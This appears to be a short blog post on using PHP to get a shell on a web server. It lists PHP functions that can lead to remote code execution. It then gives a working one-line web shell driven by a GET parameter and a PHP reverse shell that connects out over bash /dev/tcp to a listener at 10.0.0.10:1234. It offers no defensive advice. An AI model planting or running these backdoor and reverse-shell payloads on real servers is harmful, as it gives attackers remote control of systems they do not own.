Today I will be writing about the php functions which enable the attacker for gaining the shell. Common php functions which enable you to create backdoor. This blog deals with php5 security.
shell_exec() , exec() , passthru() ,system() ,popen()
eval(), create_function(), extract(), file_get_contents, fopen, include, require, curl functions all also can lead to rce
Smallest PHP shell
<?=`$_GET[1]`?>
Reverse Shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");?>
This was link that I found while googling